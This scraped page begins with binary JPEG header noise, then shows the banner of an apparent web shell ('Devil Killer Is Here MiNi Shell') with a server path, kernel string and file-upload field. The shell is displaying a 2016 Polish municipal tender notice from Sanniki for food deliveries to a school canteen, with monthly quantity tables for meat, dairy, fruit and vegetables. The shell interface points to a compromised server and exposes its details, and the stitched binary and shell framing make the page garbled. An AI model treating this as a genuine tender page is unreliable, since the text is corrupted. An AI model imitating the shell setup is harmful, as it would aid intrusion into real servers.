JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160720/147041-N-2016.html

<p class="kh_header"><b>Sanniki: Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2016/2017</b><br>
<b>Numer ogłoszenia: 147041 - 2016; data zamieszczenia: 20.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sanniki , ul. Warszawska 169, 09-540 Sanniki, woj. mazowieckie, tel. 24 277 68 51, faks 24 277 68 51, 277 78 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanniki.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2016/2017.
Dostawa artykułów objętych niniejszym zamówieniem odbywać się będzie w ilościach wcześniej zamówionych przez intendentki. Zamawiający zastrzega sobie prawo zmiany ilości poszczególnych artykułów wymienionych w planowanym zapotrzebowaniu miesięcznym.
Dostarczane produkty muszą spełniać wymogi sanitarnohigieniczne właściwe dla danej kategorii produktu w zakresie przewidzianym przez ustawę o bezpieczeństwie żywności. Wykonawca jest zobowiązany do dostarczania artykułów najlepszej jakości, tj. świeżych, 
I gatunku, czystych, z właściwym terminem przydatności do spożycia.
Wszystkie produkty wymienione w siwz z nazwy należy traktować jako produkty określające standardy jakościowe. Zamawiający dopuszcza możliwość zaoferowania artykułów równoważnych. Artykuł równoważny powinien mieć parametry jakościowe, wydajnościowe i smakowe nie gorsze niż wskazany z nazwy produkt. W przypadku zaoferowania przez Wykonawcę artykułu równoważnego należy podać nazwę artykułu i producenta. Zamówienie obejmuje artykuły spożywcze z następujących grup asortymentowych: 1. Mięso, produkty mięsno-wędliniarskie i drób, 2. Mleko i przetwory mleczne, 3. Owoce i przetwory owocowe, 4. Warzywa i przetwory warzywne, 5. Przyprawy, makarony, mąki i kasze, 6. Ryby, 7. Pieczywo. Szczegółowy zapis przedmiotu zamówienia określony jest w opisie części zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.20.00.00-0, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1. Formularz ofertowy - załącznik nr 1 do SIWZ. III.6. 2. Kalkulacja cenowa -załącznik nr 5 do SIWZ III.6.3.Zobowiązanie podmiotów trzecich do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (jeśli dotyczy). III.6.4. Pełnomocnictwo osoby lub osób podpisujących ofertę- jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów. III.6.5.Dokumenty wymagane w przypadku składania oferty wspólnej. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. III.4.2, III.4.4 dla każdego wykonawcy z osobna, pozostałe dokumenty mogą być złożone wspólnie. III.6.6 Dokumenty podmiotów zagranicznych. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. 2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian: 2.1.zmiana gramatury dostarczanych produktów w przypadku wprowadzenia przez producenta innej gramatury niż określona w ofercie Wykonawcy, 2.2. zmiana asortymentu w przypadku wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt, z gwarancję zachowania oferowanej ceny, 2.3. zmiana cen produktów w przypadku, gdy z powodu istotnej zmiany ceny nieprzewidzianej przy zawarciu umowy, spełnienie przedmiotu umowy groziłoby jednej ze stron rażącą stratą. 2.4. zmiana ilości w poszczególnych grupach asortymentowych artykułów wymienionych w załączniku nr 1do umowy z zachowaniem cen jednostkowych. 2.5. czas trwania umowy może zostać przedłużony aneksem o maksymalnie 3 miesiące, w przypadku gdy łączna maksymalna wartość umowy określona w § 1 ust 1 nie została przekroczona o 10%.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanniki.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sannikach 
ul. Warszawska 169, 
09-540 Sanniki, 
pokój nr 14..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2016 godzina 09:50, miejsce: Urząd Gminy w Sannikach 
ul. Warszawska 169, 
09-540 Sanniki, 
pokój nr 10 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Udział innych podmiotów w realizacji zamówienia: Zgodnie z art. 26. ust.2b ustawy prawo zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w pkt 1 zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących: - zakresu dostępnych wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, - charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust 2b ustawy Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na zasoby którego Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia powyższe warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mięsa produktów mięsno-wędliniarskich i drobiu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 

Lp.	Nazwa produktu	Ilość 	jednostki
1	schab z kością	26	kg
2	schab bez kości	20	kg
3	pachwina wędzona	7	kg
4	łopatka bez kości	65	kg
5	żeberka	52	kg
6	wołowina rosołowa	6	kg
7	golonka	2	kg
8	mięso mielone	5	kg
9	mięso na gulasz	20	kg
10	flaki drobiowe	11	kg
11	boczek	8	kg
12	wołowina bez kości	40	kg
13	polędwica sopocka	3	kg
14	kiełbasa podwawelska	9	kg
15	kiełbasa biała surowa	17	kg
16	kiełbasa śląska	8	kg
17	szynka z indyka	13	kg
18	szynka	3	kg
19	kurczaki	69	kg
20	udka	20	kg
21	piersi z kością	26	kg
22	porcje rosołowe	12	kg
23	skrzydełka	35	kg
24	filet z kurczaka	20	kg
25	wątróbka drobiowa	10	kg
26	pałeczki z kurczaka	45	kg
27	mięso mielone z indyka	11	kg
28	skrzydełka z indyka	6	kg
29	polędwiczki wieprzowe	1	kg
30	karkówka	1	kg
31	indyk faszerowany	3	kg
32	szynka swojska	3	kg
33	polędwica miodowa	3	kg
34	polędwica z warzywami 	3	kg
35	kiełbasa krakowska podsuszana 	3 	kg
36	parówki drobiowe	3	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i przetworów mlecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 

Lp.	Nazwa produktu	Ilość 	Jednostki
1	ser biały - półtłusty	54	kg
2	mleko w folii 2%	92	l
3	śmietana 30% (0,5l)	83	szt.
4	masło śmietankowe - 200g 	110	szt.
5	masło roślinne w kubku - 250g	36	szt.
6	serek Danio lub równoważny - 150g	199	szt.
7	serek Twój smak lub równoważny - 200g	10	szt.
8	ser żółty Gouda lub równoważny	4	kg
9	jogurt (mały)- 120g Danone Gratka lub równoważny	30	szt.
10	jogurt naturalny 370g Zott lub równoważny	30	szt.
11	jogurt smakowy 150g Jogobella lub równoważny	145	szt.
12	masło klarowane 500g Mlekowita lub równoważne	9	szt.
13	śmietana 18% 400g Piątnica lub równoważna	15	szt.
14	jogurt naturalny typu greckiego 440 g Bakoma lub równoważny	25	szt.
15	ser parmezan 125g 	2	szt.
16	serek topiony (różne smaki) 100g Hohland lub równoważny	17	szt.
17	ser feta 270g Mlekowita lub równoważny	6	szt.
18	maślanka 750 g Łowicz lub równoważna	4	szt.
19	mleko w butelce 2%	90	l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa owoców i przetworów owocowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 

L.p	Nazwa produktu	Ilość 	Jednostki
1	jabłka	111	kg
2	cytryny	11	kg
3	banany	48	kg
4	dżem truskawkowy 280g z Łowicza lub równoważny	29	szt.
5	dżem brzoskwiniowy 280g z Łowicza lub równoważny	10	szt.
6	dżem wiśniowy 280 g Łowicz lub równoważny	11	szt.
7	powidła śliwkowe 400g	3	szt.
8	truskawki mrożone 450g	7	kg
9	wiśnie mrożone 450g	9	kg
10	mandarynki	30	kg
11	truskawki (produkty sezonowe)	19	kg
12	gruszki	34	kg
13	winogron	1	kg
14	brzoskwinie	10	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa warzyw i przetworów warzywnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
L.p	Nazwa produktu	Ilość 	Jednostki
1	ziemniaki	620	kg
2	ziemniaki młode	84	kg
3	marchew	60	kg
4	pietruszka	26	kg
5	por	21	kg
6	pieczarki	12	kg
7	pomidory	12	kg
8	ogórki świeże	17	kg
9	groch	5	kg
10	koper	22	p
11	natka pietruszki	15	p
12	cebula	11	kg
13	cebula czerwona	2	kg
14	kapusta pekińska	15	kg
15	kapusta biała	13	kg
16	kapusta młoda w sezonie	14	szt.
17	kapusta kwaszona	31	kg
18	seler	20	kg
19	fasola szparagowa	2	kg
20	fasola	13	kg
21	kalafior świeży	2	kg
22	kalafior mrożony 450 g	17	szt.
23	szpinak mrożony 450g Hortex lub równoważny	9	szt.
24	fasola mrożona 450g	6	szt.
25	sałata zwykła	11	szt.
26	sałata lodowa 	19	szt.
27	mix sałat 100g	15	szt.
28	koncentrat pomidorowy 30% 190g Łowicz lub równoważny	37	szt.
29	sok pomidorowy 1 l Fortuna lub równoważny	5	szt.
30	rzodkiewka	6	p
31	chrzan biały w słoiku 200g Victus lub równoważny	3	szt.
32	kapusta czerwona	4	kg
33	ogórki kwaszone	20	kg
34	kapusta włoska	2	szt.
